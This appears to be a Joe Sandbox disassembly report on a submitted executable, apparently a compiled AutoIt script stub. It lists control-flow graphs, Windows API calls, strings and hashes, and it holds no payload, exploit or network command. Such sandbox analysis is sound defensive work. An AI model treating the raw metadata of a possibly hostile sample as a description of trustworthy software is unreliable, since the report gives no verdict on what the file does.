                          control_flow_graph 1904 40e500-40e57c call 40bc70 GetVersionExW call 402160 call 40e660 call 40e680 1913 40e582-40e583 1904->1913 1914 427674-427679 1904->1914 1917 40e585-40e596 1913->1917 1918 40e5ba-40e5cb call 40ef60 1913->1918 1915 427683-427686 1914->1915 1916 42767b-427681 1914->1916 1920 427693-427696 1915->1920 1921 427688-427691 1915->1921 1919 4276b4-4276be 1916->1919 1922 427625-427629 1917->1922 1923 40e59c-40e59f 1917->1923 1936 40e5ec-40e60c 1918->1936 1937 40e5cd-40e5e6 GetCurrentProcess call 40ef20 1918->1937 1938 4276c6-4276ca GetSystemInfo 1919->1938 1920->1919 1927 427698-4276a8 1920->1927 1921->1919 1929 427636-427640 1922->1929 1930 42762b-427631 1922->1930 1925 40e5a5-40e5ae 1923->1925 1926 427654-427657 1923->1926 1932 40e5b4 1925->1932 1933 427645-42764f 1925->1933 1926->1918 1931 42765d-42766f 1926->1931 1934 4276b0 1927->1934 1935 4276aa-4276ae 1927->1935 1929->1918 1930->1918 1931->1918 1932->1918 1933->1918 1934->1919 1935->1919 1939 40e612-40e623 call 40efd0 1936->1939 1940 4276d5-4276df GetSystemInfo 1936->1940 1937->1936 1947 40e5e8 1937->1947 1938->1940 1939->1938 1946 40e629-40e63f call 40ef90 GetNativeSystemInfo 1939->1946 1950 40e641-40e642 FreeLibrary 1946->1950 1951 40e644-40e651 1946->1951 1947->1936 1950->1951 1952 40e653-40e654 FreeLibrary 1951->1952 1953 40e656-40e65d 1951->1953 1952->1953
                          APIs
                          • GetVersionExW.KERNEL32(?), ref: 0040E52A
                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                          • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                          • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                          • FreeLibrary.KERNEL32(?), ref: 0040E642
                          • FreeLibrary.KERNEL32(?), ref: 0040E654
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                          • String ID: 0SH$#v
                          • API String ID: 3363477735-2448020801
                          • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                          • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                          • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                          • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                          APIs
                          • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                          • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: IsThemeActive$uxtheme.dll
                          • API String ID: 2574300362-3542929980
                          • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                          • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                          • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                          • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                          APIs
                          • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                          • FreeLibrary.KERNEL32(?), ref: 0040D78E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: FreeInfoLibraryParametersSystem
                          • String ID: #v
                          • API String ID: 3403648963-554117064
                          • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                          • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                          • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                          • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                          APIs
                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                          • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                          • TranslateMessage.USER32(?), ref: 00409556
                          • DispatchMessageW.USER32(?), ref: 00409561
                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Message$Peek$DispatchSleepTranslate
                          • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                          • API String ID: 1762048999-758534266
                          • Opcode ID: 23d079a985ba2b1b40b9133d067a4c416b55a71ed9da253c2d941bd9d0d29544
                          • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                          • Opcode Fuzzy Hash: 23d079a985ba2b1b40b9133d067a4c416b55a71ed9da253c2d941bd9d0d29544
                          • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A

                          Control-flow Graph

                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                          • __wcsicoll.LIBCMT ref: 00402007
                          • __wcsicoll.LIBCMT ref: 0040201D
                          • __wcsicoll.LIBCMT ref: 00402033
                            • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                          • __wcsicoll.LIBCMT ref: 00402049
                          • _wcscpy.LIBCMT ref: 0040207C
                          • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104), ref: 00428B5B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                          • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$CMDLINE$CMDLINERAW
                          • API String ID: 3948761352-1609664196
                          • Opcode ID: de7630e39462d0d30620e5d386b824db2ab2692deedf796b652438eb031e1025
                          • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                          • Opcode Fuzzy Hash: de7630e39462d0d30620e5d386b824db2ab2692deedf796b652438eb031e1025
                          • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99

                          Control-flow Graph

                          APIs
                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                          • __wsplitpath.LIBCMT ref: 0040E41C
                            • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                          • _wcsncat.LIBCMT ref: 0040E433
                          • __wmakepath.LIBCMT ref: 0040E44F
                            • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                            • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                          • _wcscpy.LIBCMT ref: 0040E487
                            • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                          • _wcscat.LIBCMT ref: 00427541
                          • _wcslen.LIBCMT ref: 00427551
                          • _wcslen.LIBCMT ref: 00427562
                          • _wcscat.LIBCMT ref: 0042757C
                          • _wcsncpy.LIBCMT ref: 004275BC
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                          • String ID: Include$\
                          • API String ID: 3173733714-3429789819
                          • Opcode ID: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                          • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                          • Opcode Fuzzy Hash: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                          • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E

                          Control-flow Graph

                          APIs
                          • _fseek.LIBCMT ref: 0045292B
                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                            • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                            • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                          • __fread_nolock.LIBCMT ref: 00452961
                          • __fread_nolock.LIBCMT ref: 00452971
                          • __fread_nolock.LIBCMT ref: 0045298A
                          • __fread_nolock.LIBCMT ref: 004529A5
                          • _fseek.LIBCMT ref: 004529BF
                          • _malloc.LIBCMT ref: 004529CA
                          • _malloc.LIBCMT ref: 004529D6
                          • __fread_nolock.LIBCMT ref: 004529E7
                          • _free.LIBCMT ref: 00452A17
                          • _free.LIBCMT ref: 00452A20
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                          • String ID:
                          • API String ID: 1255752989-0
                          • Opcode ID: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                          • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                          • Opcode Fuzzy Hash: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                          • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: __fread_nolock$_fseek_wcscpy
                          • String ID: FILE
                          • API String ID: 3888824918-3121273764
                          • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                          • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                          • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                          • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5

                          Control-flow Graph

                          APIs
                          • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                          • RegisterClassExW.USER32(00000030), ref: 004104ED
                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                          • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                          • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                          • ImageList_ReplaceIcon.COMCTL32(00B52B48,000000FF,00000000), ref: 00410552
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                          • API String ID: 2914291525-1005189915
                          • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                          • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                          • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                          • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99

                          Control-flow Graph

                          APIs
                          • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                          • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                          • LoadIconW.USER32(?,00000063), ref: 004103C0
                          • LoadIconW.USER32(?,000000A4), ref: 004103D3
                          • LoadIconW.USER32(?,000000A2), ref: 004103E6
                          • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                          • RegisterClassExW.USER32(?), ref: 0041045D
                            • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                            • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                            • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                            • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                            • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                            • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                            • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00B52B48,000000FF,00000000), ref: 00410552
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                          • String ID: #$0$AutoIt v3
                          • API String ID: 423443420-4155596026
                          • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                          • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                          • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                          • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: _malloc
                          • String ID: Default
                          • API String ID: 1579825452-753088835
                          • Opcode ID: 443df2c3c68efbd16d3948df002b7be0acb455de1234585f427717e2e3840c69
                          • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                          • Opcode Fuzzy Hash: 443df2c3c68efbd16d3948df002b7be0acb455de1234585f427717e2e3840c69
                          • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1954 40f5c0-40f5cf call 422240 1957 40f5d0-40f5e8 1954->1957 1957->1957 1958 40f5ea-40f613 call 413650 call 410e60 1957->1958 1963 40f614-40f633 call 414d04 1958->1963 1966 40f691 1963->1966 1967 40f635-40f63c 1963->1967 1970 40f696-40f69c 1966->1970 1968 40f660-40f674 call 4150d1 1967->1968 1969 40f63e 1967->1969 1974 40f679-40f67c 1968->1974 1971 40f640 1969->1971 1973 40f642-40f650 1971->1973 1975 40f652-40f655 1973->1975 1976 40f67e-40f68c 1973->1976 1974->1963 1977 40f65b-40f65e 1975->1977 1978 425d1e-425d3e call 4150d1 call 414d04 1975->1978 1979 40f68e-40f68f 1976->1979 1980 40f69f-40f6ad 1976->1980 1977->1968 1977->1971 1991 425d43-425d5f call 414d30 1978->1991 1979->1975 1982 40f6b4-40f6c2 1980->1982 1983 40f6af-40f6b2 1980->1983 1984 425d16 1982->1984 1985 40f6c8-40f6d6 1982->1985 1983->1975 1984->1978 1987 425d05-425d0b 1985->1987 1988 40f6dc-40f6df 1985->1988 1987->1973 1990 425d11 1987->1990 1988->1975 1990->1984 1991->1970
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: __fread_nolock_fseek_memmove_strcat
                          • String ID: AU3!$EA06
                          • API String ID: 1268643489-2658333250
                          • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                          • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                          • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                          • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1994 401100-401111 1995 401113-401119 1994->1995 1996 401179-401180 1994->1996 1998 401144-40114a 1995->1998 1999 40111b-40111e 1995->1999 1996->1995 1997 401182 1996->1997 2002 40112c-401141 DefWindowProcW 1997->2002 2000 401184-40118e call 401250 1998->2000 2001 40114c-40114f 1998->2001 1999->1998 2003 401120-401126 1999->2003 2011 401193-40119a 2000->2011 2004 401151-401157 2001->2004 2005 40119d 2001->2005 2003->2002 2007 42b038-42b03f 2003->2007 2008 401219-40121f 2004->2008 2009 40115d 2004->2009 2012 4011a3-4011a9 2005->2012 2013 42afb4-42afc5 call 40f190 2005->2013 2007->2002 2010 42b045-42b059 call 401000 call 40e0c0 2007->2010 2008->2003 2016 401225-42b06d call 468b0e 2008->2016 2014 401163-401166 2009->2014 2015 42b01d-42b024 2009->2015 2010->2002 2012->2003 2019 4011af 2012->2019 2013->2011 2021 42afe9-42b018 call 40f190 call 401a50 2014->2021 2022 40116c-401172 2014->2022 2015->2002 2020 42b02a-42b033 call 4370f4 2015->2020 2016->2011 2019->2003 2026 4011b6-4011d8 KillTimer call 401000 PostQuitMessage 2019->2026 2027 4011db-401202 SetTimer RegisterWindowMessageW 2019->2027 2020->2002 2021->2002 2022->2003 2030 401174-42afde call 45fd57 2022->2030 2027->2011 2028 401204-401216 CreatePopupMenu 2027->2028 2030->2002 2045 42afe4 2030->2045 2045->2011
                          APIs
